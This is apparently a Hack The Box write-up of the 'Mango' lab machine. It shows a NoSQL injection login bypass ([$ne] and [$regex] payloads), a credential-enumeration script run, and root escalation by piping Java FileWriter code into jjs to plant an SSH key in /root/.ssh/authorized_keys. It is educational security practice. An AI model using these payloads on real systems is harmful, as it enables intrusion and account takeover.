Enumeration
Began with a nmap scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
bros@Bros10:~/HTB/Retired/Mango$ nmap -sC -sV -oA scan 10.10.10.162
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-24 18:11 BST
Nmap scan report for 10.10.10.162
Host is up (0.040s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after: 2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.74 seconds
We can see here that if we go to the website on port 80 we get a 403 Forbidden error, then if we navigate to port 443 we get an error stating that it’s using SSL therefore we’ve got to navigate to https://10.10.10.162/ (443 isn’t needed as it’s default for HTTPS) we find a website which seems to have some sort of database. Coming back to the nmap scan we can see that the subject has a common name which is staging-order.mango.htb.
So we add staging-order.mango.htb into the /etc/hosts file and navigate to the site. Here we see a login form, we begin by attempting some default credentials but have no success. We know that there has to be a database on the backend which I was assuming was MongoDB due to the name of the box being close to Mongo. Begin by attempting to do some manual SQL injection and have no success so we now run sqlmap against the form and leave that running for a while, coming back it has no success. I go back to all the sites we have access to, play around with all the data and the features but have no success. I ended up searching MongoDB injection attack and came across NoSQL injection. NoSQL is where you don’t query the database using SQL queries therefor SQL injection won’t work against the login form.
Initial Foothold
NoSQL Injection
I read up on a few articles and came across this article which allowed me to understand the attack and then successfully bypass the Login form. I accomplished this by entering the Username : admin and Password : admin, then turning on my Burp Proxy on firefox. Loading up Burp Suite, turning Intercept on and sending the request from the login form. Then once I’ve intercepted the form I change the parameters to this : username=admin&password[&ne]=admin and forward the request, which allows us into the home page. Said home page is under construction and doesn’t let us anywhere but I want to attempt to explain why appending [&ne] authenticated us.
[&ne] stands for not equal, so within this case it will find the first admin account within the database that doesn’t have a password of admin and then authenticate using that account. This works as there is no validation and the values submitted are just inputted into JSON like this ` {“username”:”admin”,”password”:{“$ne”: “admin”}}`.
We have now reached a standstill, we’ve bypassed the authentication however that doesn’t lead us anywhere. So I continue to do some research around NoSQL injection within MongoDB and find an CTF writeup where someone manages to use a brute forcing method to find out the credentials for an admin account. They achieve this as if you intercept the request, append [®ex] to it you can begin to try each character and if it’s matched correctly the website will 302. For example, let’s say the Username is admin the the correct password is root. If you submit these parameters : username=admin&password[®ex]=r then you will get a 302 error back from the site. Showcasing that r is the first character of the password. Meaning you could write a script that manages to brute force the password, I began to write said script but found this script instead. So I just ran git clone https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration and ran the help aspect to see how to utilise the script.
1
bros@Bros10:~/HTB/Retired/Mango/Nosql-MongoDB-injection-username-password-enumeration$ python nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -ep username -op login:login,submit:submit -m POST
So we parse in all the information needed within the parameters, -up flag determines the username form name,-pp is the name of the password form and -ep is what form we are brute forcing. Then we need to provide -op for the login form and the submit button.
1
2
3
2 username(s) found:
admin
mango
After running it for a period of time we get 2 successful user accounts back.
1
bros@Bros10:~/HTB/Retired/Mango/Nosql-MongoDB-injection-username-password-enumeration$ python nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -ep password -op login:login,submit:submit -m POST
We then run this script again but change it to enumerate passwords.
1
2
3
2 password(s) found:
h3mXK8RhU~f{]f5H
t9KcS3>!0B#2
Which we find 2 sets of passwords for.
User
We now have 2 users and 2 sets of credentials, so we attempt to SSH into the box using both accounts and sets of credentials. We can successfully SSH in as mango and then within the box we can change user su admin and input the other password. From there we can then cat the user flag.
Root
We begin Root by setting up a simple HTTP server on our local machine so we can get linpeas onto the HTB machine.
1
2
3
bros@Bros10:~/HTB/Retired/Mango$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.162 - - [24/Jul/2020 19:44:50] "GET /linpeas.sh HTTP/1.1" 200 -
We fetch said script using wget.
1
RED/YELLOW: 99% a PE (Privilege Escelate) vector
This means that we should take a look at jjs first, we can use which jjs to find out the location of the binary. jjs seems to be a Java shell which is interactive and can run Java programming statements, after doing some research around it I found that I could just utilise the load function to load the root.txt file.
1
2
3
4
5
6
admin@mango:/$ /usr/bin/jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> load("/root/root.txt");
<shell>:1 SyntaxError: /root/root.txt:1:1 Missing space after numeric literal
8a8......
^
Getting shell as Root
However I also wanted to try to get a shell as root, meaning we would want to try and SSH in as root. I attempted to load the roots private SSH key however it didn’t seem to exist. So looking at GTFObins we can see that we can write to files, so we copy and paste said commands into a bash script which should echo it and pipe into into the JJS binary. We can see here that we are piping my SSH public key into the roots authorized_keys file. Meaning that we should then be able to SSH in as root utilising my SSH private key.
1
2
3
4
5
bros@Bros10:~/HTB/Retired/Mango$ cat ssh.sh
echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw=new FileWriter("/root/.ssh/authorized_keys");
fw.write("ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC+GtvKWz5s9cZWcWVkO0JQneEhk/adF7E7CfLVCaExFwEKQOpNsIWXKjg07BNfvRBPRehm/uhLDSlXTKAldmvhxv0cLHJV3N/SLZG3D2abjX9ejSHr6p1hpZRuNc+xJTHww+AhCyDUSaVmEf1Nrcrd0hMA4T7/LCn2jzN1XS3ZAg1HK7LH205PcvOy4XLytcwslSA02wqlN7OJpytl3pwCvdCa1anRGrE4MD4xQ58CKEdsU6w1cmP2HSBDtuDzk2TJzXeyX5B30vaYSLIxS0DeoUcJq1v/Ohf3TCxLAZUMn5gtpD5FMe1sPi0JbE8vtwk/F3/7z8BZRBjakqe0oyNKab1eSaA1o1wtMTwsRU4VKjUuPW1+0iouf2UeJi43zZsOwl5n4wCvtvleEu1tvdhAQ5MJAP9wyuvoF3rZitICwtSvG6XQcqIsNbBqT5UJ6h1ZvIWXwavFkg8i0Qsd25LkSzZEHaCAl9z1GyG47WJN3d4KutY9vPVd+1au2Ec8tgDnnN8l0FJijlfHbefOnj6fx4XBJmZWpL2AHHrqnnyzbfbCeXm2RGU7P1DN6kqxFYIInWkwC6i9FLH34Vxym3EARoBhiws8WIcqqoTKDJ7kdipCJC+RsdRsPYk4i2MlZOrlhJ+Y8L5N9iqCRWBiyVI1JRnWZo2DhPjIL1K4rwlSXQ== bossingbros10@gmail.com");
fw.close();' | jjs
This writes successfully and then I attempt to SSH in.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
ssh -i id_rsa root@10.10.10.162
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Jul 24 20:22:24 UTC 2020
System load: 0.0 Processes: 140
Usage of /: 26.0% of 19.56GB Users logged in: 1
Memory usage: 12% IP address for ens33: 10.10.10.162
Swap usage: 15%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
122 packages can be updated.
18 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Oct 10 08:33:27 2019
root@mango:~# whoami
root
And we have achieved our goal of obtaining a shell as root.
Conclusion
In Conclusion, this box began with the need to navigate to HTTPS instead of HTTP, then add the host name into /etc/hosts where we then bypassed the login form utilising NoSQL injection. Using another method of NoSQL injection we can brute force to find usernames and credentials. Allowing us to then SSH into the box as Mango, switch user to Admin and then utilise JJS as it’s ran as root allowing us to read root.txt and also write our own public SSH key into the roots authorized_keys file.